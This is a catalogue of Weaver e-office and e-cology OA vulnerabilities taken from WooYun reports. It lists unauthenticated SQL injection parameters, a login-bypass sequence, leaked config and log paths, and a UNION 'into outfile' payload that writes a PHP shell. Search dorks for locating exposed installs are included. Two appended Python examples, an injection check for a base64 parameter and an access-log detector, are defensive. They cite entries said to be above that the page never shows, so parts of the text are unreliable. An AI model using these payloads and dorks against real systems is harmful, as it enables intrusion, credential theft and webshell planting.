SQL injection
/client_converter.php  // userAccount, lang, funcID
Login bypass
Step 1: /client_converter.php?userAccount=admin&lang=cn  (populates the session)
Step 2: /general/system/user/userlist.php
Defect ID: wooyun-2015-0112675
Title: Weaver OA system (Weaver E-COLOGY) has a serious information security vulnerability
/weaver/weaver.file.FileDownload?fileid=12
Defect ID: wooyun-2015-0105535
Title: Weaver Eoffice unauthenticated SQL injection (multiple)
1 /E-mobile/diarydo.php  // diary_id
2 /E-mobile/notify_page.php  // detailid
3 /E-mobile/emailreply_page.php  // detailid
4 /E-mobile/sms_page.php  // detailid
5 /E-mobile/source_page.php  // emailid
Defect ID: wooyun-2015-0105520
Title: Weaver e-office unauthenticated GETSHELL
/E-mobile/Data/login_other.php
stripslashes() is applied to the input, undoing the GPC escaping, so quotes survive and injection is possible
Payload:
/E-mobile/Data/login_other.php?diff=sync&auth={"auths":[{"value":"-1' UNION SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23"}]}
/e-mobile/Data/login_other.php?diff=sync&auth={%22auths%22:[{%22value%22:%22-1%27%20UNION%20SELECT%201,2,%27%3C?php%20phpinfo();%20?%3E%27,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20into%20outfile%20%27D:/eoffice/webroot/shell.php%27%23%22}]}
Shell path: http://url/shell.php
Defect ID: wooyun-2015-0105290
Title: Weaver e-office one unauthenticated injection
/inc/priv_user_list/priv_xml.php  // userpriv (array-typed parameter; the injection payload must be base64-encoded)
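Added example (not from either report and not Weaver's code), covering the base64 array parameter used by group_xml.php (wooyun-2015-0128007) and priv_xml.php (wooyun-2015-0105290): an encoder/decoder for the "[key]:[value]|[key]:[value]" form, the numeric-id check the vulnerable pages lack, and a detection view that flags values carrying SQL metacharacters. The item syntax is inferred from the two payloads on this page; any other field names the real pages accept are not known here.

```python
import base64
import re

# One item is "[key]:[value]"; items are joined with "|". A value ends at the first "]"
# that is followed by "|" or by the end of the string.
ITEM_RE = re.compile(r"\[([^\]]*)\]:\[(.*?)\](?=\||$)", re.DOTALL)
ID_LIST_RE = re.compile(r"\d+(?:,\d+)*")


def encode_array_param(items):
    """Build the plaintext form and base64-encode it the way the pages above expect."""
    raw = "|".join("[%s]:[%s]" % (key, value) for key, value in items)
    return base64.b64encode(raw.encode("utf-8")).decode("ascii")


def decode_array_param(encoded):
    """Inverse of encode_array_param: returns a list of (key, value) pairs.
    Raises ValueError if the decoded string is not a clean sequence of items."""
    raw = base64.b64decode(encoded).decode("utf-8")
    items = [(m.group(1), m.group(2)) for m in ITEM_RE.finditer(raw)]
    if "|".join("[%s]:[%s]" % kv for kv in items) != raw:
        raise ValueError("malformed array parameter: %r" % raw)
    return items


def is_safe_id_list(items):
    """Server-side check the vulnerable pages lack: every value must be a decimal id
    (or a comma-separated list of ids) before it goes anywhere near SQL."""
    return all(ID_LIST_RE.fullmatch(value) is not None for _, value in items)


def values_with_injection_chars(items):
    """Detection view: the (key, value) pairs carrying characters that have no place in an id."""
    return [(k, v) for k, v in items if re.search(r"['\";()\s]|--|/\*", v)]


if __name__ == "__main__":
    probe = decode_array_param("W2dyb3VwXTpbMV18W2dyb3VwaWRdOlsxJ10=")
    print(probe, is_safe_id_list(probe), values_with_injection_chars(probe))
```

Decoding the second payload from the group_xml.php entry with decode_array_param yields the groupid value ending in "into outfile '../webroot/axxxxxxxx.php'", which is the string the page shows in plaintext; a WAF or log pipeline that only sees the base64 form has to do this decode before any keyword rule can fire.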
Defect ID: wooyun-2015-0104799
Title: Weaver Eoffice multiple-file SQL injection, continued (no login required)
/E-mobile/flowimg.php  // FLOW_ID, RUN_ID
Defect ID: wooyun-2015-0104782
Title: Weaver Eoffice multiple-file SQL injection (no login required)
(1) /eoffice/api/email.class.php  // emailid
(2) /E-mobile/source_page.php  // emailid
(3) /E-mobile/emailreply_page.php  // emailid
(4) /E-mobile/email_page.php  // emailid
Defect ID: wooyun-2014-087500
Title: Weaver Eoffice unauthenticated direct getshell
/mysql_config.ini
Defect ID: wooyun-2014-082627
Title: generic SQL injection bundle in a Weaver system (all versions)
(1) /homepage/Homepage.jsp  // hpid
(2) /page/element/7/News.jsp  // eid
(3) /CRM/data/ViewCustomerBase.jsp  // requestid
(4) /page/element/compatible/view.jsp  // eid
(5) /page/element/Weather/View.jsp  // eid
(6) /proj/data/ViewProject.jsp  // ProjID
Defect ID: wooyun-2014-078802
Title: yet another Weaver e-cology SQL injection (no login required)
homepage/LoginHomepage.jsp  // hpid
Defect ID: wooyun-2014-078769
Title: Weaver e-cology SQL injection (no login required)
/page/maint/login/Page.jsp  // templateId
Defect ID: wooyun-2014-076547
Title: Weaver system vulnerability collection (a white hat who does not get a shell is not a proper white hat)
// login required
Vulnerable module: My mail -> Contacts -> Import -> comma-separated CSV file
The uploaded file ends up at: http://url/email/csv/<uploaded file name>.jsp
Defect ID: wooyun-2014-072571
Title: Weaver eteams_oa: modify any user's information without authorization
// login required
Defect ID: wooyun-2014-055521
Title: Weaver E-office OA management system: SQL injection allows passwordless login as any real user name
POST request to general/index.php,
smsid is 1 union select '1','1','admin','1','1','1','1','1','1','1','1','1','1','1'; both values are 3DES-encrypted and then base64-encoded
Defect ID: wooyun-2013-034523
Title: Weaver E-office OA management system SQL injection, the database can be dumped
/general/file_folder/file_new/neworedit/index.php  // CONTENT_ID
Log file accessible without authorization
/log/ecology_date.log
wooyun-2015-0125281 (no further information found)
wooyun-2015-0125265 (no further information found)
wooyun-2010-07497 (no further information found)
wooyun-2010-034523 (no further information found)
Google search: allintext: 用户名: 密码: 记住密码. 自动登录. E-Mobile
Baidu dork: 泛微协同商务系统
ZoomEye search: 泛微/
Fofa dork: app="泛微-协同办公OA"
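Added example (not part of the original list and not a Weaver tool): a detector that runs the pre-auth endpoints catalogued above over web-server access logs, for the defensive side of the same list. The log lines are constructed for the example (combined log format, documentation IP ranges); the rule names are the author's labels, and the rule set is deliberately limited to endpoints that appear on this page.

```python
import re
from urllib.parse import parse_qs, unquote

# Access-log lines constructed for this example; the requests mirror endpoints listed above.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Sep/2019:10:01:22 +0800] "POST /weaver/bsh.servlet.BshServlet HTTP/1.1" 200 312 "-" "python-requests/2.22.0"
203.0.113.7 - - [12/Sep/2019:10:01:30 +0800] "GET /mobile/dbconfigreader.jsp HTTP/1.1" 200 1854 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Sep/2019:10:02:05 +0800] "GET /ServiceAction/com.eweaver.base.DataAction?sql=select%20LONGONNAME,LOGONPASS%20from%20SYSUSER HTTP/1.1" 200 9021 "-" "curl/7.64.1"
192.0.2.15 - - [12/Sep/2019:10:03:11 +0800] "GET /login/Login.jsp?logintype=1 HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Sep/2019:10:04:40 +0800] "GET /e-mobile/Data/login_other.php?diff=sync&auth=%7B%22auths%22%3A%5B%5D%7D HTTP/1.1" 200 77 "-" "curl/7.64.1"
192.0.2.15 - - [12/Sep/2019:10:05:02 +0800] "GET /sysinterface/codeEdit.jsp?filename=ccccc.jsp&filetype=jsp HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
"""

# (rule name, regex on the decoded path, query parameter that must be present or None).
# Paths are matched with search(), not anchored at the start, because several entries
# above use a leading "//" and the servlet container still routes them.
RULES = [
    ("ecology BshServlet script execution", r"/weaver/bsh\.servlet\.BshServlet", None),
    ("ecology dbconfigreader.jsp config leak", r"/mobile/dbconfigreader\.jsp", None),
    ("ecology WorkflowCenterTreeData.jsp SQLi", r"/mobile/browser/WorkflowCenterTreeData\.jsp", None),
    ("ecology DataAction raw SQL", r"/ServiceAction/com\.eweaver\.base\.DataAction", "sql"),
    ("ecology codeEdit.jsp file write", r"/sysinterface/codeEdit\.jsp", "filename"),
    ("ecology file download by fileid", r"/weaver/weaver\.(?:file\.filedownload|email\.FileDownloadLocation)", "fileid"),
    ("eoffice officeserver.php file operation", r"/iweboffice/officeserver\.php", "OPTION"),
    ("eoffice login_other.php SQLi", r"/E-mobile/Data/login_other\.php", "auth"),
    ("eoffice uploadify.php upload", r"/uploadify\.php$", None),
    ("eoffice webservice upload", r"/webservice(?:-json|-xml)?(?:/upload)?/upload\.php", None),
    ("eoffice client_converter.php login bypass", r"/client_converter\.php", "userAccount"),
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')


def classify_request(target):
    """Names of the rules a request target (path plus query string) matches."""
    path, _, query = target.partition("?")   # not urlsplit: a leading "//" would become a netloc
    path = unquote(path)
    params = parse_qs(query, keep_blank_values=True)
    return [name for name, path_re, param in RULES
            if re.search(path_re, path, re.IGNORECASE) and (param is None or param in params)]


def scan_log(lines):
    """Parse combined-format lines and return one finding per (line, rule) hit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for rule in classify_request(m.group("target")):
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"), "method": m.group("method"),
                             "status": int(m.group("status")), "rule": rule,
                             "target": m.group("target")})
    return findings


def hits_per_source(findings):
    """Count findings by client IP for a quick triage of who is probing the OA."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for f in found:
        print("%-13s %s %s %s -> %s" % (f["ip"], f["ts"], f["method"], f["target"], f["rule"]))
    print(hits_per_source(found))
```

Two details matter in practice: POST bodies (the BshServlet script, the formids payload) never reach the access log, so those rules key on the path alone and a 200 is enough to warrant pulling the request from a full-packet or WAF source; and the query-parameter condition is there to keep ordinary traffic to shared handlers such as DataAction or the file-download servlet from paging anyone.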